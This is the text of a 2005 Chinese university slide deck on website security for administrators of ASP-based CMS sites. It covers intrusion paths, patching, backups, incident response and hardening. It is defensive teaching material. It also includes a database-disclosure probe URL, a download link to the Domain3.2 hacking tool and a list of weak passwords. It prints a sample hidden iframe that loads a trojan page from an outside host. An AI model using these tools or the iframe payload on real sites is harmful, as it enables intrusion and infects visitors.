网站安全与维护 嘉庚五 502 2005.12.8 现代教育技术中心 吴飞杰 2005.12.8 TechEd 2002
目录 简单的入侵分析 平时该做些什么? 如何应对网络安全事件 几个小技巧
一、简单的入侵分析 通过搜索引擎找到带有特征字符的网站 ↓ 判断CMS系统类型和版本 测试漏洞是否存在 利用漏洞攻击 留下后门 首先还原一下可能的入侵思路: 通过搜索引擎找到带有特征字符的网站 ↓ 判断CMS系统类型和版本 测试漏洞是否存在 利用漏洞攻击 留下后门 清除入侵的痕迹
1、技术层面的初步分析 以动力文章系统3.x为例,可能的入侵途径主要有以下三种: 注入:相关内容前面已经有专题讲座,这里不再重复了,可以参考 http://web.xmu.edu.cn/3/SQL.ppt 暴库:即数据库暴露,进而被下载。简单的检测方法就是访问http://???.xmu.edu.cn /inc/conn.asp,,如果出错信息中可以显示出数据库的路径,就存在这个漏洞 解决方法,把数据库扩展名改为asa。比如在上面这个例子中,数据库应改为adsfkldfogowerjnokfdslwejhdfsjhk.asa
上传:这是最近几次攻击被普遍利用的漏洞,已经流行了将近两年的攻击方式。相关的安全公告请访问 http://asp163 上传:这是最近几次攻击被普遍利用的漏洞,已经流行了将近两年的攻击方式。相关的安全公告请访问 http://asp163.net/Announce/ShowArticle.asp?ArticleID=39 对于动力系统,最好删除Upfile_AdPic.asp,Upfile_Article.asp,Upfile_OrderPic.asp,Upfile_Photo.asp,Upfile_Soft.asp,Upfile_SoftPic.asp文件或者打补丁。 补丁文件地址: http://metc.xmu.edu.cn/Files/Special/patch3x.rar
2、心理层面的分析 所有的入侵者,归结起来无非这么几种: 无意识破坏 有些人在现实生活中不得志,就幻想通过网络使自己扬名立万,篡改他人网站主页,并打上自己的标记(如昵称,QQ号码,网址等)。这些人的水平一般不高,因为其入侵的目标是随机的,只是通过搜索引擎找到特定的有公开漏洞的系统,然后利用现成的工具进行攻击。这类入侵者防不胜防,不过只要平时安全意识稍微高一些,很容易阻止他们。 善意提醒 此类入侵者并不以破坏为目的,他们会通过和管理员联系或者留下警告页面来提醒管理员。这时切忌恼羞成怒,应用虚心的态度向对方求教,找出漏洞所在,积极进行修补。说不准在这个过程中还能结识一些真正的高手,有助于提高网站的安全性。 蓄意破坏 这种攻击最具破坏性,后果最严重。原因可能是不法分子有针对性的攻击,也可能网站成员的个人问题导致别人的报复。攻击者有明确的目标,其水平一般较高,一旦发生要特别注意应对。
两个被入侵站点的截图
首页被篡改的网站
二、平时该做些什么? 随着网络技术的发展,网站管理员的工作早已不仅仅局限于简单的添加信息。
1、天天关注你负责的网站 把你管理的网站设为浏览器的首页,每天至少看三次你所管理的网站,残酷地说,管理员没有节假日,因为节假日恰恰是攻击的高发时段。 2、 经常关注程序提供商的官方网站或订阅其相关公告的RSS 负责任的开发商都有一个正规的官方网站,及时地公布最新的漏洞和相应的补丁,这也是选用网站系统的标准之一。 以下是常用CMS产品的官方网址 动力(动易) http://asp163.net/ 风迅 http://www.foosun.cn/ 乔客 http://www.joekoe.com/ NB文章系统 http://forum.nbarticle.com/default.asp 动网先锋 http://aspsky.net/ 青创文章系统 http://www.qcdn.net/
3、定期备份数据库和供下载的文档 定期备份数据库和上传的文件,如果不是很经常更新,访问量不大,大概每周备份一次,反之每天一次,不要怕麻烦,这个制度很有必要,特别是要经常对外发布信息,提供资料下载的网站,更要做好这方面的工作。 此处以现代教育技术中心网站为例,其他网站的目录名称可能有些不同
4、经常用FTP登陆,查看上传目录下的文件格式 动力系统的上传目录有: UploadAdpic,UploadFiles,UploadPhotos,UploadSoft,UploadSoftPic,UploadThumbs 上传目录下不应该有asp,cer,cdx,com,exe,bat之类的文件. 一般情况下,允许上传的文件格式有: 图片文件:JPG,GIF,BMP,PNG,PSD,WMF,PCX OFFICE文档:DOC,XLS,PPT,MDB 文本文件:TXT,RTF 多媒体文件:MPG,MP3,MIDI,WMA,WMV,WAV,AVI,RM,RMVB,RAM,ASF 压缩文件:RAR,ZIP,ISO
5、选用合适的CMS系统 选用的代码必须比较成熟,经过一段时间检验没有重大问题。代码书写规范,可读性高,方便二次开发或者修改。 尽量从官方网站下载,避免使用插件版,HACK版,修改版等,因为这些版本可能是由业余人士修改的,有些程序的安全性非常脆弱,前一段时间动网论坛的插件漏洞频出就说明了这一点。 经常关注官方网站的补丁发布,及时修改。 如果有必要,通读一遍代码,加深理解,寻找漏洞,至少做到了解每一个文件的具体作用。 这里推荐一个带漏洞搜索引擎的漏洞公布网址: http://www.cnbct.org/
6、强壮的密码 管理的帐号密码应与管理员个人常用的不同,以防他人从别处得到网站的密码。如果有多个管理员,要保证所有人的密码都是“健壮的”,即不能像“123456”这样容易猜测,必须是数字、字母和符号的组合。这点很重要,不然所有的安全措施都是徒劳! 常见的弱口令有: “空口令” admin 123456 abc 19821017 asdf hello ……
三、如何应对网络安全事件? 1、冷静、冷静再冷静 遇到突发的安全事件,首先保持应该冷静,理清头绪,不管情况有多严重。 2、用备份文件替换被篡改的文件,同时注意保存证据 下载被黑的网站以保存相关证据。然后用平时备份的资料替代被篡改的数据,及时恢复网站功能,最大限度降低不良影响。 3、暂时删除网站的后台 暂时把管理后台删除,这是没有办法的办法。在漏洞没找出之前,网站是极不安全的,可能遭到二次破坏,造成更恶劣的影响。 4、及时报告分管领导 在初步处理完后,把损失情况报告分管领导
5、分析入侵途径 可以向虚拟主机管理员索要事故发生前后几天的IIS访问记录,分析漏洞所在。 6、修补漏洞,查找后门 7、总结经验教训 吃一堑长一智,没有任何一个网站是永远安全的,我们不怕出错,只怕一错再错。
四、几个小技巧 1、文件时间一致原则 简单的说就是保持大部分文件的上传时间一致(数据库之类频繁读写的文件除外)。具体做法是一次上传所有文件,这里建议就算修改了一个文件也重新上传一下所有网页,这样做主要是方便查找木马。
2、文件对比法 这里介绍一个简单的文件对比工具Beyond Compare 下载地址:http://210.34.212.108/softdown/SoftView.Asp?SoftID=8538
3、软件测试法 某些“傻瓜化的”黑客工具能提供一个初步的测试,比如Domain3.2 下载地址:http://metc.xmu.edu.cn/Files/Special/Domain3.2.rar 软件的使用十分简单,比如上传漏洞,只要填入上传文件的地址就可以了 这也从一个侧面反映出入侵一个站点的技术门槛之低,只要会打字,会复制粘贴就行。
软件检测结果仅供参考,并不能保证绝对没有问题 SQL注入检测 软件检测结果仅供参考,并不能保证绝对没有问题
4、网站改版后,如需保留旧版,要记得删除旧版的后台。 如果改版,应及时删除旧版的后台管理,特别是上传模块,测试版本尽量不上网,宁可等完善后再上传,要知道现在搜索引擎的技术已十分成熟,别有用心的人很容易找到这些薄弱点进行破坏。 同时,注意清理放到网站上的文件,不要把包含敏感信息的文档放到网站空间里。很多人以为在网页上看不到的文档就是安全的,其实不然。
5、不要把数据库扩展名更名为asp! 如果使用ACEESS数据库,应把数据库放在比较怪异的文件夹下,并修改扩展名为ASA,试验证明,扩展名改成ASP是没用的,还是可以下载,而且可能被暗藏ASP木马在数据库中。此外,不要使用数据库备份、恢复功能。有证据表明这有可能使入侵者绕过上传文件的限制。要备份,直接FTP下载就可以了。
6、给用户尽可能少的功能和权限 功能越复杂,可能出现的漏洞越多,除非你对自己的技术很有信心,否则请谨慎向用户开放上传等容易受到攻击的功能。很典型的例子是在线投稿功能,其实只要公布一个Email地址就可以了,不需要制作专门的投稿模块。 对于动力文章系统,建议删除以下模块: 所有用户模块 留言系统 广告系统 数据库备份/还原模块
7、出错信息越模糊越好 这里的出错信息包括程序的错误信息和对攻击行为的提示信息。程序的错误信息可能暴露数据库的类型、位置,也可能为注入提供方便;对攻击行为的提示信息太激烈则可能激怒对方,要知道,没有做不到只有想不到,你自以为安全的站点别人总是有办法进入的,不管用什么手段。 不痛不痒,莫名其妙的提示信息
8、请学生兼职建设网站要注意什么? 有些单位缺乏网站建设方面的人员,就聘请学生兼职,这种情况下,尽量不要让学生一次做完就撒手不管了,最好能作为一个长期的合作。任何网站都不是永远安全的,漏洞的发现需要时间的积累,所以网站也要不断打补丁,这就和操作系统一样。另外,长期的合作能使学生产生责任感,也方便网站的交接工作。 如果管理员对技术问题不是很了解,可以在对兼职学生进行说明的时候,把这里罗列的几个注意事项告诉他们。网站建成后,最好能请第三方进行一次安全测试。
9、访问网站时提示发现病毒怎么办? 遇到这种情况,十有八九是被入侵了,而且几乎可以肯定是上传漏洞被利用,入侵者在网页中加入了病毒代码,企图让网站访问者中毒。遇到这种情况,首先应该马上替换掉染毒页面,然后按应对安全事件的方法处理。 一般来说,利用网页挂木马,通常都是用iframe链接到另外一个网站的木马文件,所以在检查的时候,只要用记事本打开染毒页面,搜索关键字“IFRAME”即可。 一段典型的病毒代码: <html> <iframe src=“http://xxx.com/muma.htm" width="0" height="0" frameborder="0"></iframe> </html>
1)用官方网站提供的最新正式版,不用插件版,hack版的动网,因为插件编写者很多都是不专业的,没有考虑安全问题 10、使用动网论坛系统要注意什么? 按照规定,使用论坛等带有交互式功能的系统需要严格的审批,不能擅自架设。如果是经过批准的,已经在使用的动网论坛系统,要注意以下问题: 1)用官方网站提供的最新正式版,不用插件版,hack版的动网,因为插件编写者很多都是不专业的,没有考虑安全问题 2)关注官方论坛bbs.dvbbs.net,打补丁,虽然很累,但是从负责任的角度看很有必要 3)关闭头像上传功能,最好关闭所有上传,连负责上传的文件都删掉 4)如果是自己的主机,把上传目录,如UploadFile等的脚本执行权限改为无 5)记得删除install.asp,key.asp文件 6)后台管理登陆密码和前台登陆不一样 7)去掉备份数据库/还原数据库功能,因为此功能可以被asp木马上传者利用,比如上传的木马被自动改为gif后可利用此功能再还原为asp 8)关闭flash标签,设置论坛脚本过滤扩展,iframe,object,script
11、删除管理系统的特征字符 以动力3.51为例,页面下方的“Powered by:MyPower Ver3.51”和管理登陆页面的“后台管理页面需要屏幕分辨率为 1024*768 或以上才能达到最佳浏览效果!”就是入侵者判断文章系统类型的依据之一。如果有可能,还可以把特征文件名改掉,如显示文章的Article_Show.asp,可以在Dreamweaver里面,用全站替换的方法,改成Shownews.asp之类的名字,进一步干扰入侵者的判断。
12、作为一个非计算机专业背景的网站管理员要掌握什么? 1) 熟悉操作系统,网络浏览器,FTP客户端的使用 2) 认识常见的扩展名 静态网页:HTM,HTML 动态网页:ASP,PHP,Jsp 样式表:CSS Javascript脚本:JS 可执行文件:EXE,COM 批处理文件:BAT 3)Dreamweaver的简单使用,包括建立站点,管理站点,简单页面编辑等。 4)利用搜索引擎查找信息的能力 5)一本工作日志 记载网站的基本信息:FTP密码,管理后台密码,修改了哪些文件,什么时候被入侵过,发现什么漏洞,做了什么修补工作。
相关下载: 动力3.62 SP2修正版 : http://metc.xmu.edu.cn/Files/Special/FPSP2.rar 动力3.x上传漏洞补丁: http://metc.xmu.edu.cn/Files/Special/patch3x.rar Domain3.2 : http://metc.xmu.edu.cn/Files/Special/Domain3.2.rar Domain3.2的使用演示: http://metc.xmu.edu.cn/Files/Special/Domain3.exe Beyond Compare v2.03 http://210.34.212.108/softdown/SoftView.Asp?SoftID=8538 Beyond Compare的使用演示: http://metc.xmu.edu.cn/Files/Special/Beyond Compare.exe
谢 谢 大 家